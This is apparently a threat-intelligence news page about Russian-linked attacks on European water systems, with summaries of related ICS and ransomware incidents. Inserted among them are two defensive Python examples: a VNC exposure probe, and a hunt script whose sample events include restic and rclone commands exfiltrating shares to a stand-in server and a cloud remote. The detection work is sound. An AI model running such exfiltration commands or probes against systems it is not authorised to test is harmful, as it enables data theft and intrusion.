CyberHappenings

Russian Actors Target Water Systems in Norway, Poland, Denmark, and Romania

4 unique sources, 5 articles

Summary


Russian and allied state-sponsored actors continue to target water systems across Europe as part of a broader hybrid campaign. In Poland, the Internal Security Agency (ABW) has documented cyberattacks against industrial control systems (ICS) at five water treatment plants in 2025: Jabłonna Lacka, Szczytno, Małdyty, Tolkmicko, and Sierakowo. Attackers gained access to operational systems and were able to modify equipment parameters, with the potential to disrupt public water supplies. The campaign relies on weak password policies and internet-exposed systems, with attribution pointing to the Russian APT groups APT28 and APT29, the Belarusian-linked UNC1151, and hacktivist personas acting as state proxies. Incidents in Norway, Poland, and Denmark involved destructive or disruptive actions against water utilities, while Romania experienced a ransomware attack on its national water authority that has not been attributed. These attacks form part of a sustained influence operation aimed at undermining Western support for Ukraine and demonstrating asymmetric cyber capabilities against critical infrastructure.

Timeline

  1. 22.12.2025 17:25 2 articles · 4mo ago

    Romanian Waters Hit by Ransomware Attack

    Romanian Waters, the country's water management authority, was hit by a ransomware attack in which the attackers used Windows BitLocker to encrypt approximately 1,000 systems across the national authority and 10 of its 11 regional offices, and left a ransom note with a seven-day deadline. The investigation remains ongoing and no attribution has been made.

  2. 19.12.2025 14:28 4 articles · 4mo ago

    Denmark Blames Russia for Cyberattacks on Water Utility

    Polish authorities report that in August 2025 a cyberattack could have cut off a city's water supply but was thwarted. The Internal Security Agency (ABW) later documented ICS breaches at five water treatment plants in 2025 (Jabłonna Lacka, Szczytno, Małdyty, Tolkmicko, and Sierakowo), where attackers gained access to operational systems and obtained the ability to modify equipment parameters, creating a direct risk to operational continuity and to the public water supply. ABW attributed primary responsibility to hacktivist groups that often act as state proxies, alongside the Russian state actors APT28 and APT29 and the Belarusian-linked UNC1151, and identified weak password policies and internet-exposed systems as the primary attack vectors.

  3. 15.08.2025 16:00 3 articles · 8mo ago

    Russian Actors Target Water Systems in Norway and Poland

    On August 13, 2025, Norway's counter-intelligence agency attributed an April attack on a dam to Russian hackers, who opened a flood gate and released about 500 liters of water per second for roughly four hours. The attack demonstrated the potential for water systems to be used as geopolitical pawns. Poland also reported a similar attack on a large city's water supply, which could have been cut off. In December 2025, Danish intelligence officials blamed Russia for orchestrating cyberattacks against Denmark's critical infrastructure, including a destructive attack on a water utility. Two Russian groups, Z-Pentest and NoName057(16), were identified as operating on behalf of the Russian state. The attacks are part of a broader influence campaign intended to undermine Western support for Ukraine.


Similar Happenings

Iranian Hacktivist Group Claims Wiper Attack on Stryker

The Iranian hacktivist group Handala—linked to Iran’s Ministry of Intelligence and Security (MOIS)—conducted a destructive wiper attack against Stryker, a U.S. Fortune 500 medical technology company, on March 11, 2026. The attack affected over 200,000 systems across 79 countries, disrupted operations in Ireland, and sent over 5,000 workers home. Handala claimed responsibility, citing retaliation for a U.S. missile strike. The attack leveraged Microsoft Intune to issue remote wipe commands and defaced Stryker’s Entra login page. Stryker confirmed the incident in an SEC filing and reported no evidence of data exfiltration. Recovery efforts prioritized restoring supply-chain systems. In a separate but related development, Handala breached the personal email account of FBI Director Kash Patel on March 28, 2026, and leaked historical emails from 2010 and 2019. The FBI acknowledged the targeting and stated the leaked data was not government-related. Handala operates under multiple monikers, including Banished Kitten and Void Manticore, and has integrated criminal tools such as Rhadamanthys stealer to enhance its operations. The group’s activities align with broader Iranian cyber operations targeting Western entities amid heightened geopolitical tensions, including destructive attacks, hack-and-leak campaigns, and psychological influence operations. U.S. authorities have seized multiple domains linked to Handala and offered a $10 million reward for information on group members.

Increased ICS Vulnerability Exploits and Hacktivist Activity in 2025

In 2025, cyber threat actors, including both cybercriminals and hacktivists, significantly increased their attacks on industrial control systems (ICS) and operational technology (OT) environments. The number of ICS vulnerability disclosures nearly doubled compared to 2024, with Siemens and Schneider Electric being the most affected vendors. Ransomware attacks also surged, particularly targeting manufacturing and healthcare sectors, while hacktivist groups focused on energy, utilities, and transportation sectors. The report predicts continued targeting of exposed HMI and SCADA systems in 2026.

Pro-Russia Hacktivists Target Critical Infrastructure with Low-Sophistication Attacks

Pro-Russia hacktivist groups are conducting opportunistic, low-sophistication cyberattacks against U.S., UK, and global critical infrastructure. These attacks target a wide range of sectors, including water treatment facilities, food production, energy systems, and local government bodies, using easily repeatable methods. The groups exploit minimally secured, internet-facing virtual network computing (VNC) connections to gain unauthorized access to operational technology (OT) control devices. The joint advisory from CISA, FBI, NSA, and global partners, along with a recent warning from the UK National Cyber Security Centre (NCSC), urges immediate action to mitigate these threats. The advisory highlights the use of basic methods to target supervisory control and data acquisition (SCADA) networks, sometimes combined with DDoS attacks. The cumulative impact of these activities poses a persistent and disruptive threat to essential services.

According to a new report, groups such as Cyber Army of Russia Reborn (CARR), Z-Pentest, NoName057(16), and Sector16 are using simple reconnaissance tools and common password-guessing techniques to reach internet-facing human-machine interfaces. In some cases these intrusions have had physical impacts, including temporary loss of view and costly manual recovery efforts.

The NCSC warns of continued malicious activity from Russian-aligned hacktivist groups targeting critical infrastructure and local government organizations in the UK with disruptive distributed denial-of-service (DDoS) attacks. The NCSC notes that NoName057(16) operates the DDoSia project, a platform that lets volunteers contribute computing resources to crowdsourced DDoS attacks in return for monetary rewards or recognition from the community. Operation Eastwood disrupted NoName057(16)'s activity in mid-July 2025 by arresting two members of the group, issuing eight arrest warrants, and taking down 100 servers. Despite these efforts, the group has returned to action, highlighting the evolving threat it poses.

Recent developments indicate that attackers are growing more interested in, and more accustomed to, dealing with industrial machines, which could lead to more sophisticated OT attacks. Ric Derbyshire, principal security engineer at Orange Cyberdefense, will demonstrate 'living-off-the-plant' attacks at the RSA Conference 2026; these require a holistic understanding of the physical process, OT systems, network architecture, security controls, and human interactions.
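The advisory's point that these intrusions ride on minimally secured, internet-facing VNC is checkable from the first few bytes a server sends. The following is an added example, not code from the advisory, the NCSC or the page: it parses the RFB (VNC) handshake defined in RFC 6143 and grades what a server offers, so an asset owner can find HMIs that accept unauthenticated ("None") or password-only connections. The handshake captures are constructed for the example; the risk labels and the optional live probe are the author's assumptions and the probe should only be pointed at hosts you are authorised to test.

```python
"""Grade the authentication an RFB/VNC server offers during its handshake.

Added example, not part of the advisory or the page. The captures below are
constructed; probe_vnc() is optional and only for hosts you own.
"""
import socket
import struct

# Security-type codes from RFC 6143 section 7.1.2 and the IANA RFB registry.
SECURITY_TYPES = {
    0: "Invalid",
    1: "None",
    2: "VNC Authentication",
    5: "RA2",
    6: "RA2ne",
    16: "Tight",
    18: "TLS",
    19: "VeNCrypt",
    20: "SASL",
    30: "Apple Remote Desktop",
}


def parse_version(banner: bytes) -> tuple:
    """Parse the 12-byte ProtocolVersion message, e.g. b'RFB 003.008\\n'."""
    if len(banner) != 12 or not banner.startswith(b"RFB ") or banner[-1:] != b"\n":
        raise ValueError(f"not an RFB banner: {banner!r}")
    major, minor = banner[4:11].decode("ascii").split(".")
    return (int(major), int(minor))


def parse_security_types(version: tuple, payload: bytes) -> list:
    """Return the security types the server offers after the version exchange.

    RFB 3.3 servers send a single U32 type (0 means the connection failed).
    RFB 3.7+ servers send a U8 count followed by that many U8 types; a count
    of 0 means the server refused and a U32 length-prefixed reason follows.
    """
    if version < (3, 7):
        (sec_type,) = struct.unpack(">I", payload[:4])
        if sec_type == 0:
            raise ConnectionError("RFB 3.3 server reported connection failure")
        return [sec_type]
    count = payload[0]
    if count == 0:
        (reason_len,) = struct.unpack(">I", payload[1:5])
        reason = payload[5:5 + reason_len].decode("utf-8", "replace")
        raise ConnectionError(f"server refused connection: {reason}")
    return list(payload[1:1 + count])


def assess(banner: bytes, payload: bytes) -> dict:
    """Classify exposure the way a defender triaging internet-facing VNC would.

    The grading is this example's assumption, not the advisory's.
    """
    version = parse_version(banner)
    types = parse_security_types(version, payload)
    names = [SECURITY_TYPES.get(t, f"unknown({t})") for t in types]
    if 1 in types:
        risk = "critical"   # anyone who can reach the port gets the desktop
    elif all(t == 2 for t in types):
        risk = "high"       # 8-char DES challenge-response, no lockout, cleartext session
    elif any(t in (18, 19, 20) for t in types):
        risk = "medium"     # transport protection is at least on offer
    else:
        risk = "review"
    return {"version": version, "security_types": names, "risk": risk}


def probe_vnc(host: str, port: int = 5900, timeout: float = 3.0) -> dict:
    """Live check against a host you are authorised to test (not exercised here)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(12)
        version = parse_version(banner)
        # Reply with the highest version we speak that the server also supports.
        s.sendall(b"RFB 003.008\n" if version >= (3, 8) else banner)
        return assess(banner, s.recv(256))


# Constructed captures (no real hosts): what a server sends after the client
# echoes its version.
CAPTURES = {
    "hmi-open":   (b"RFB 003.008\n", b"\x01\x01"),          # None only
    "hmi-pwd":    (b"RFB 003.008\n", b"\x01\x02"),          # VNC Authentication only
    "hmi-legacy": (b"RFB 003.003\n", b"\x00\x00\x00\x02"),  # RFB 3.3, U32 type 2
    "hmi-tls":    (b"RFB 003.008\n", b"\x02\x13\x02"),      # VeNCrypt and VNC Auth
}

if __name__ == "__main__":
    for name, (banner, payload) in CAPTURES.items():
        print(name, assess(banner, payload))
```

The parse is done on the server's bytes before any authentication is attempted, so it works against the same exposed HMIs the hacktivists find without sending a single password guess; anything graded "critical" or "high" is a candidate for removal from the internet or for fronting with a VPN or TLS-capable VNC.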

INC Ransom Gang Disrupts OnSolve CodeRED Emergency Alert Platform

The INC Ransom gang has disrupted the OnSolve CodeRED emergency alert platform, stealing sensitive user data and forcing Crisis24 to decommission the legacy environment. The attack affected emergency notification systems used by state and local governments, police departments, and fire agencies across the United States. Stolen data includes names, addresses, email addresses, phone numbers, and passwords. The gang claims to have breached the system on November 1, 2025, and to have encrypted files on November 10, 2025. Crisis24 is rebuilding the service from backups dated March 31, 2025, so accounts created after that date may be missing. The incident highlights the critical impact of cyberattacks on emergency services and the importance of robust cybersecurity measures. The INC Ransom group has published screenshots of the stolen data and is selling samples of it, escalating concerns among affected agencies. Separately, an operational security failure by the INC ransomware gang allowed researchers to recover data stolen from a dozen U.S. organizations. The investigation, conducted by Cyber Centaurs, found artifacts from the legitimate backup tool Restic that exposed attacker infrastructure, and the researchers developed a controlled enumeration process that confirmed the presence of encrypted data stolen from 12 unrelated organizations.
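The Restic artifacts that exposed INC's infrastructure are a reminder that legitimate backup tools are a favoured exfiltration channel, and that their command lines are distinctive enough to hunt on. The following is an added example, not from the Cyber Centaurs investigation or the page: it scans process-creation events for restic pushing a `backup` to a remote repository, or rclone copying to a configured remote, matching on syntax rather than on the binary's name because attackers rename tools. The event lines and their pipe-delimited layout (timestamp|host|user|parent_image|image|command_line), the parent-process allow-list, and the 203.0.113.x address are all constructed for the example.

```python
"""Hunt process-creation events for restic/rclone used as an exfiltration channel.

Added example, not from the Cyber Centaurs report or the page. Event layout
and content are constructed: timestamp|host|user|parent_image|image|command_line.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Remote repository schemes restic accepts after -r/--repo or in RESTIC_REPOSITORY.
RESTIC_REMOTE = re.compile(
    r"(?:(?:-r|--repo)\s+|RESTIC_REPOSITORY=)"
    r"[\"']?(?P<repo>(?:sftp|s3|rest|rclone|b2|azure|gs|swift):[^\s\"']+)",
    re.IGNORECASE,
)
# rclone transfer verbs followed by a "remote:path" destination. A remote name
# needs two or more characters so a Windows drive letter ("C:\...") is not matched.
RCLONE_REMOTE = re.compile(
    r"\brclone(?:\.exe)?\b.*?\b(?:copy|sync|move|copyto|moveto)\b"
    r".*?\s(?P<remote>[A-Za-z][A-Za-z0-9_-]+:\S*)",
    re.IGNORECASE,
)
# Assumption for the example: parents that legitimately wrap backup tools at this site.
KNOWN_BACKUP_PARENTS = {"veeam.backup.service.exe"}


@dataclass
class Finding:
    timestamp: str
    host: str
    user: str
    tool: str
    destination: str
    reason: str


def inspect_event(line: str) -> Optional[Finding]:
    """Return a Finding if the process looks like restic/rclone moving data off-host."""
    ts, host, user, parent, image, cmd = line.split("|", 5)
    parent_exe = parent.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if parent_exe in KNOWN_BACKUP_PARENTS:
        return None  # sanctioned backup agent; tune this allow-list per environment
    m = RESTIC_REMOTE.search(cmd)
    if m and re.search(r"\bbackup\b", cmd):
        return Finding(ts, host, user, "restic", m["repo"],
                       "restic 'backup' to a remote repository")
    m = RCLONE_REMOTE.search(cmd)
    if m:
        return Finding(ts, host, user, "rclone", m["remote"],
                       "rclone transfer to a configured remote")
    return None


def hunt(events: List[str]) -> List[Finding]:
    """Run inspect_event over a batch of events and keep the hits."""
    return [f for f in (inspect_event(e) for e in events) if f is not None]


# Constructed events; 203.0.113.10 is a documentation address, not a real server.
EVENTS = [
    # Renamed restic binary pushing a file share to an attacker-controlled REST server.
    r"2025-11-03T02:14:07Z|FS01|CORP\svc_backup|C:\Windows\System32\cmd.exe|C:\ProgramData\upd.exe|"
    r'upd.exe -r rest:https://203.0.113.10:8000/fs01 --password-file C:\ProgramData\p.txt backup "D:\Shares"',
    # Sanctioned backup agent invoking restic: suppressed by the parent allow-list.
    r"2025-11-03T02:15:00Z|FS02|NT AUTHORITY\SYSTEM|C:\Program Files\Veeam\Veeam.Backup.Service.exe|C:\Tools\restic.exe|"
    r"restic.exe -r s3:s3.example.internal/vault backup E:\Data",
    # rclone copy of a mailbox export to a cloud remote.
    r"2025-11-03T02:16:42Z|EXCH01|CORP\jdoe|C:\Windows\explorer.exe|C:\Users\jdoe\rclone.exe|"
    r"rclone.exe copy C:\Temp\export mega:drop --transfers 8",
    # Benign: restic snapshots against a local repository, no network destination.
    r"2025-11-03T02:17:10Z|WS17|CORP\ops|C:\Windows\explorer.exe|C:\Tools\restic.exe|"
    r"restic.exe -r D:\Backups snapshots",
]

if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f"{f.timestamp} {f.host} {f.user}: {f.tool} -> {f.destination} ({f.reason})")
```

Matching on `-r <scheme>:` plus the `backup` verb catches the renamed binary in the first event and ignores the local-only invocation in the last one; the parent-process allow-list is where false positives from a real backup agent are removed, and it is the one part of the hunt that has to be tuned per environment.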

Hacktivist Intrusions Target Canadian Water and Energy Facilities

Hacktivists have breached critical infrastructure systems in Canada, tampering with industrial controls at a water treatment facility, an oil and gas firm, and an agricultural facility. These incidents highlight the risks of poorly secured industrial control systems (ICS) and the need for stronger security measures. The breaches resulted in degraded service, false alarms, and potentially unsafe conditions. The attacks were opportunistic and aimed at attracting media attention and undermining trust in Canadian authorities. No catastrophic consequences were reported, but the incidents underscore the vulnerability of ICS components such as PLCs, SCADA systems, HMIs, and industrial IoT devices.